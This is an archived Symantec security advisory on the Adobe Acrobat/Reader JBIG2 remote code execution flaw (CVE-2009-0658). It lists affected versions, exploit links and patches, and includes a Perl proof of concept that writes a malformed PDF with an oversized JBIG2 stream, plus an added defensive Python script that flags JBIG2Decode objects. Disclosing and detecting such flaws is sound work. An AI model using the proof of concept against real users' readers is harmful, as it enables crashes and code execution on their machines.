Written by Symantec
Tuesday, 17 March 2009 21:55
Adobe Acrobat and Reader PDF File Handling JBIG2 Image Remote Code Execution Vulnerability
Bugtraq ID: 33751
Class: Boundary Condition Error
CVE: CVE-2009-0658
Remote: Yes
Local: No
Published: Feb 19 2009 12:00AM
Updated: Mar 17 2009 05:26PM
Credit: Symantec
Vulnerable:
Nortel Networks Self-Service Speech Server 0
Nortel Networks Self-Service Peri Application 0
Nortel Networks Self-Service MPS 500 0
Nortel Networks Self-Service MPS 1000 0
Nortel Networks CallPilot 703t
Nortel Networks CallPilot 600r
Nortel Networks CallPilot 201i
Nortel Networks CallPilot 1005r
Nortel Networks CallPilot 1002rp
Adobe Acrobat Standard 8.1.3
Adobe Acrobat Standard 8.1.2
Adobe Acrobat Standard 8.1.1
Adobe Acrobat Standard 7.0.8
Adobe Acrobat Standard 7.0.7
Adobe Acrobat Standard 7.0.6
Adobe Acrobat Standard 7.0.5
Adobe Acrobat Standard 7.0.4
Adobe Acrobat Standard 7.0.3
Adobe Acrobat Standard 7.0.2
Adobe Acrobat Standard 7.0.1
Adobe Acrobat Standard 7.0
Adobe Acrobat Standard 9
Adobe Acrobat Standard 8.1
Adobe Acrobat Standard 8.0
Adobe Acrobat Standard 7.1
Adobe Acrobat Reader (UNIX) 7.0.1
Adobe Acrobat Reader (UNIX) 7.0
Adobe Acrobat Reader 8.1.3
Adobe Acrobat Reader 8.1.2
Adobe Acrobat Reader 8.1.1
Adobe Acrobat Reader 7.0.9
Adobe Acrobat Reader 7.0.9
Adobe Acrobat Reader 7.0.8
Adobe Acrobat Reader 7.0.8
Adobe Acrobat Reader 7.0.7
Adobe Acrobat Reader 7.0.6
Adobe Acrobat Reader 7.0.5
Adobe Acrobat Reader 7.0.4
Adobe Acrobat Reader 7.0.3
Adobe Acrobat Reader 7.0.2
Adobe Acrobat Reader 7.0.1
Adobe Acrobat Reader 7.0
Adobe Acrobat Reader 9
Adobe Acrobat Reader 8.1.2 Security Updat
Adobe Acrobat Reader 8.1
Adobe Acrobat Reader 8.0
Adobe Acrobat Reader 7.1
Adobe Acrobat Professional 8.1.3
Adobe Acrobat Professional 8.1.2
Adobe Acrobat Professional 8.1.1
Adobe Acrobat Professional 7.0.9
Adobe Acrobat Professional 7.0.8
Adobe Acrobat Professional 7.0.7
Adobe Acrobat Professional 7.0.6
Adobe Acrobat Professional 7.0.5
Adobe Acrobat Professional 7.0.4
Adobe Acrobat Professional 7.0.3
Adobe Acrobat Professional 7.0.2
Adobe Acrobat Professional 7.0.1
Adobe Acrobat Professional 7.0
Adobe Acrobat Professional 9
Adobe Acrobat Professional 8.1.2 Security Updat
Adobe Acrobat Professional 8.1
Adobe Acrobat Professional 8.0
Adobe Acrobat Professional 7.1
Adobe Acrobat 7.0.3
Adobe Acrobat 7.0.2
Adobe Acrobat 7.0.1
Adobe Acrobat 7.0
Not Vulnerable:
Adobe Acrobat Standard 9.1
Adobe Acrobat Reader 9.1
Adobe Acrobat Professional 9.1
Discussion:
Adobe Acrobat and Reader are prone to a remote code-execution vulnerability.
An attacker can exploit this issue to execute arbitrary code with the privileges of the user running the application or crash the application, denying service to legitimate users.
The issue affects Reader and Acrobat 9, 8.1.3 and prior, and 7.
UPDATE (February 24, 2009): Further reports suggest that this issue affects the vulnerable applications running on Apple Mac OS X and various Linux-based operating systems.
Exploit(s)/PoC(s):
Symantec captured an attempt to exploit this issue as a part of a targeted attack in the wild via 'Trojan.Pidief.E'.
A working commercial exploit is available through VUPEN Security - Exploit and PoCs Service. This exploit is not otherwise publicly available or known to be circulating in the wild.
The following commercial exploit is available for Immunity CANVAS:
https://www.immunityinc.com/downloads/immpartners/acrobat_jbig.tar.gz
The following proofs of concept are available:
http://www.securityfocus.com/data/vulnerabilities/exploits/33751-poc.pdf
33751-PoC.pl
#!/usr/bin/perl
# k`sOSe 02/22/2009
# http://vrt-sourcefire.blogspot.com/2009/02/have-nice-weekend-pdf-love.html
my $size = "\x40\x00";
my $factor = "ABCD";
my $data = "A" x 8314;
print pdf();
sub pdf() {
"%PDF-1.5\n" . "%\xec\xf5\xf2\xe1\xe4\xef\xe3\xf5\xed\xe5\xee\xf4\n" . "3 0 \n" . "xref\n" . "3 16\n" . "0000000023 00000 n \n" . "0000000584 00000 n \n" . "0000000865 00000 n \n" . "0000001035 00000 n \n" . "0000001158 00000 n \n" . "0000001287 00000 n \n" . "0000001338 00000 n \n" . "0000001384 00000 n \n" . "0000002861 00000 n \n" . "0000003637 00000 n \n" . "0000005126 00000 n \n" . "0000005173 00000 n \n" . "0000005317 00000 n \n" . "0000005370 00000 n \n" . "0000005504 00000 n \n" . "0000000714 00000 n \n" . "trailer\n" . "<</Root 4 0 R/Info 2 0 R/ID[<AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA> <AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>]/Size 19/Prev 10218>>\n" . "startxref\n" . "0\n" . "%%EOF\n" . " \n" . "4 0 obj\n" . "<</Type/Catalog/Pages 1 0 R/OCProperties<</OCGs[9 0 R 13 0 R]/D<</Order[9 0 R 13 0 R]/ON[9 0 R 13 0 R]/OFF[]>>>>>>\n" . "endobj\n" . " \n" . "5 0 obj\n" . "<</Type/Page/MediaBox[0 0 640 480]/Resources<</XObject<</Im001 7 0 R/Im002 10 0 R/Im003 11 0 R/Im004 14 0 R/Im005 16 0 R>>>>/Contents 6 0 R/Parent 1 0 R>>\n" . "endobj\n" . "6 0 obj\n" . "<</Length 56/Filter/FlateDecode>>\n" . "stream\n" . "x\x9c\xe3*T031P\x00A\x13\x0b\x08\x9d\x9c\xab\xa0\xef\x99k``\xa8\xe0\x92\xaf\x10\xc8\x85[\x81\x11!\x05\xc6\x84\x14\x98\xc0\x14\xc0\$\@\xb4\x05\xb2\n" . "S\xb0\n" . "\x00J\x15#,\n" . "endstream\n" . "endobj\n" .
"12 0 obj\n" . "<</Subtype/Image/Width 640/Height 480/ColorSpace/DeviceGray/BitsPerComponent 1/Decode[1 0]/Interpolate true/Length 1314/Filter/JBIG2Decode>>\n" . "stream\n" . "\x00\x00\x00\x01" . $size . $factor . "\x13" . $data . "endstream\n" . "endobj\n" . "13 0 obj\n" . "<</Type/OCG/Name(Text Color)>>\n" . "endobj\n" . "14 0 obj\n" . "<</Subtype/Image/Width 1/Height 1/ColorSpace/DeviceGray/BitsPerComponent 8/SMask 12 0 R/OC 15 0 R/Length 1>>\n" . "stream\n" . "\x00\n" . "endstream\n" . "endobj\n" .
"1 0 obj\n" . "<</Type/Pages/Kids[5 0 R]/Count 1>>\n" . "endobj\n" . "xref\n" . "0 3\n" . "0000000000 65535 f \n" . "0000009988 00000 n \n" . "0000010039 00000 n \n" . "trailer\n" . "<</ID[<AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA> <AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>]/Size 3>>\n" . "startxref\n" . "104\n" . "%%EOF\n";
}
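A defensive triage check for files of the kind shown above, added here as an example and not part of the Symantec record or the proof of concept: it lists the objects in a PDF whose dictionary names the JBIG2Decode filter, resolving `#xx` name escapes so an obfuscated filter name is still found. The function names and the sample bytes are constructed for this example.

```python
import re

# A PDF name is "/" followed by regular characters; any character may be
# written as a #xx hex escape, so /JBIG#32Decode is the same name as /JBIG2Decode.
_NAME = re.compile(rb"/((?:[^\x00\t\n\f\r ()<>\[\]{}/%#]|#[0-9A-Fa-f]{2})+)")
# "N G obj" up to the start of the stream body or the end of the object, so
# only the dictionary is inspected and stream bytes cannot cause a hit.
_OBJ = re.compile(rb"(\d+)\s+(\d+)\s+obj\b(.*?)(?=\bstream\b|\bendobj\b)", re.S)


def decode_name(raw: bytes) -> bytes:
    """Resolve #xx escapes so obfuscated names compare equal to plain ones."""
    return re.sub(rb"#([0-9A-Fa-f]{2})",
                  lambda m: bytes([int(m.group(1), 16)]), raw)


def jbig2_objects(pdf: bytes):
    """Return (object number, generation, obfuscated) for each object whose
    dictionary names JBIG2Decode. Heuristic: dictionaries stored inside
    compressed object streams (/ObjStm) are not visible without inflating them."""
    hits = []
    for obj in _OBJ.finditer(pdf):
        for name in _NAME.finditer(obj.group(3)):
            raw = name.group(1)
            if decode_name(raw) == b"JBIG2Decode":
                hits.append((int(obj.group(1)), int(obj.group(2)),
                             raw != b"JBIG2Decode"))
                break
    return hits


# Constructed, harmless sample: object 7 names the filter plainly, object 8
# hides it behind a hex escape, object 9 only carries the text in its stream.
SAMPLE = (
    b"%PDF-1.5\n"
    b"1 0 obj\n<</Type/Catalog/Pages 2 0 R>>\nendobj\n"
    b"7 0 obj\n<</Subtype/Image/Width 8/Height 8/Filter/JBIG2Decode/Length 4>>\n"
    b"stream\n\x00\x00\x00\x00\nendstream\nendobj\n"
    b"8 0 obj\n<</Subtype/Image/Filter [/FlateDecode /JBIG#32Decode]/Length 0>>\n"
    b"stream\n\nendstream\nendobj\n"
    b"9 0 obj\n<</Length 12>>\nstream\n/JBIG2Decode\nendstream\nendobj\n"
)

if __name__ == "__main__":
    for num, gen, obfuscated in jbig2_objects(SAMPLE):
        note = " (name written with #xx escapes)" if obfuscated else ""
        print(f"object {num} {gen} uses JBIG2Decode{note}")
```

A hit means only that the file carries a JBIG2 stream, which legitimate scanned documents also do; it is a reason to check the Reader or Acrobat version that will open the file against the list above.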
Solution:
The vendor has released updates. Please see the references for more information.
Adobe Acrobat Reader 9 --Adobe AdbeRdr910_en_US_Std.exe http://ardownload.adobe.com/pub/adobe/reader/win/9.x/9.1/enu/AdbeRdr910_en_US_Std.exe
Adobe Acrobat Professional 9 --Adobe AcroProStdUpd910_T1T2_incr.msp http://ardownload.adobe.com/pub/adobe/acrobat/win/9.x/9.1/misc/AcroProStdUpd910_T1T2_incr.msp
Adobe Acrobat Reader 7.1 --Adobe AdbeRdr910_en_US_Std.exe http://ardownload.adobe.com/pub/adobe/reader/win/9.x/9.1/enu/AdbeRdr910_en_US_Std.exe
Adobe Acrobat Reader 8.0 --Adobe AdbeRdr910_en_US_Std.exe http://ardownload.adobe.com/pub/adobe/reader/win/9.x/9.1/enu/AdbeRdr910_en_US_Std.exe
Adobe Acrobat Reader 8.1 --Adobe AdbeRdr910_en_US_Std.exe http://ardownload.adobe.com/pub/adobe/reader/win/9.x/9.1/enu/AdbeRdr910_en_US_Std.exe
Adobe Acrobat Standard 9 --Adobe AcroProStdUpd910_T1T2_incr.msp http://ardownload.adobe.com/pub/adobe/acrobat/win/9.x/9.1/misc/AcroProStdUpd910_T1T2_incr.msp
Adobe Acrobat Reader 7.0 --Adobe AdbeRdr910_en_US_Std.exe http://ardownload.adobe.com/pub/adobe/reader/win/9.x/9.1/enu/AdbeRdr910_en_US_Std.exe
Adobe Acrobat Reader 7.0.1 --Adobe AdbeRdr910_en_US_Std.exe http://ardownload.adobe.com/pub/adobe/reader/win/9.x/9.1/enu/AdbeRdr910_en_US_Std.exe
Adobe Acrobat Reader 7.0.2 --Adobe AdbeRdr910_en_US_Std.exe http://ardownload.adobe.com/pub/adobe/reader/win/9.x/9.1/enu/AdbeRdr910_en_US_Std.exe
Adobe Acrobat Reader 7.0.3 --Adobe AdbeRdr910_en_US_Std.exe http://ardownload.adobe.com/pub/adobe/reader/win/9.x/9.1/enu/AdbeRdr910_en_US_Std.exe
Adobe Acrobat Reader 7.0.4 --Adobe AdbeRdr910_en_US_Std.exe http://ardownload.adobe.com/pub/adobe/reader/win/9.x/9.1/enu/AdbeRdr910_en_US_Std.exe
Adobe Acrobat Reader 7.0.5 --Adobe AdbeRdr910_en_US_Std.exe http://ardownload.adobe.com/pub/adobe/reader/win/9.x/9.1/enu/AdbeRdr910_en_US_Std.exe
Adobe Acrobat Reader 7.0.6 --Adobe AdbeRdr910_en_US_Std.exe http://ardownload.adobe.com/pub/adobe/reader/win/9.x/9.1/enu/AdbeRdr910_en_US_Std.exe
Adobe Acrobat Reader 7.0.7 --Adobe AdbeRdr910_en_US_Std.exe http://ardownload.adobe.com/pub/adobe/reader/win/9.x/9.1/enu/AdbeRdr910_en_US_Std.exe
Adobe Acrobat Reader 7.0.8 --Adobe AdbeRdr910_en_US_Std.exe http://ardownload.adobe.com/pub/adobe/reader/win/9.x/9.1/enu/AdbeRdr910_en_US_Std.exe
Adobe Acrobat Reader 7.0.9 --Adobe AdbeRdr910_en_US_Std.exe http://ardownload.adobe.com/pub/adobe/reader/win/9.x/9.1/enu/AdbeRdr910_en_US_Std.exe
Adobe Acrobat Reader 8.1.1 --Adobe AdbeRdr910_en_US_Std.exe http://ardownload.adobe.com/pub/adobe/reader/win/9.x/9.1/enu/AdbeRdr910_en_US_Std.exe
Adobe Acrobat Reader 8.1.2 --Adobe AdbeRdr910_en_US_Std.exe http://ardownload.adobe.com/pub/adobe/reader/win/9.x/9.1/enu/AdbeRdr910_en_US_Std.exe
Adobe Acrobat Reader 8.1.3 --Adobe AdbeRdr910_en_US_Std.exe http://ardownload.adobe.com/pub/adobe/reader/win/9.x/9.1/enu/AdbeRdr910_en_US_Std.exe
Reference(s):
--/JBIG2Decode "Look Mommy, No Hands!" http://blog.didierstevens.com/2009/03/09/quickpost-jbig2decode-look-mommy-no-hands (Didier Stevens)
--/JBIG2Decode Trigger Trio http://blog.didierstevens.com/2009/03/04/quickpost-jbig2decode-trigger-trio (Didier Stevens)
--Adobe Homepage http://www.adobe.co (Adobe)
--Adobe Reader and Acrobat 9.1 update available http://blogs.adobe.com/psirt/2009/03/_adobe_reader_and_acrobat_91_u.htm (Adobe)
--Adobe Reader and Acrobat issue http://blogs.adobe.com/psirt/2009/02/adobe_reader_and_acrobat_issue.htm (Adobe)
--APSA09-01 - Buffer overflow issue in versions 9.0 and earlier of Adobe Reader an http://www.adobe.com/support/security/advisories/apsa09-01.htm (Adobe)
--Nortel Response to Adobe APSA09-01 - Buffer overflow issue in v9.0 and earlier o http://support.nortel.com/go/main.jsp?cscat=BLTNDETAIL&id=84424 (Nortel Networks)
--Security Updates available for Adobe Reader 9 and Acrobat 9 http://www.adobe.com/support/security/bulletins/apsb09-03.htm (Adobe)
--Vulnerability Note VU#905281 Adobe Reader and Acrobat memory corruption vulnerab http://www.kb.cert.org/vuls/id/90528 (US-CERT)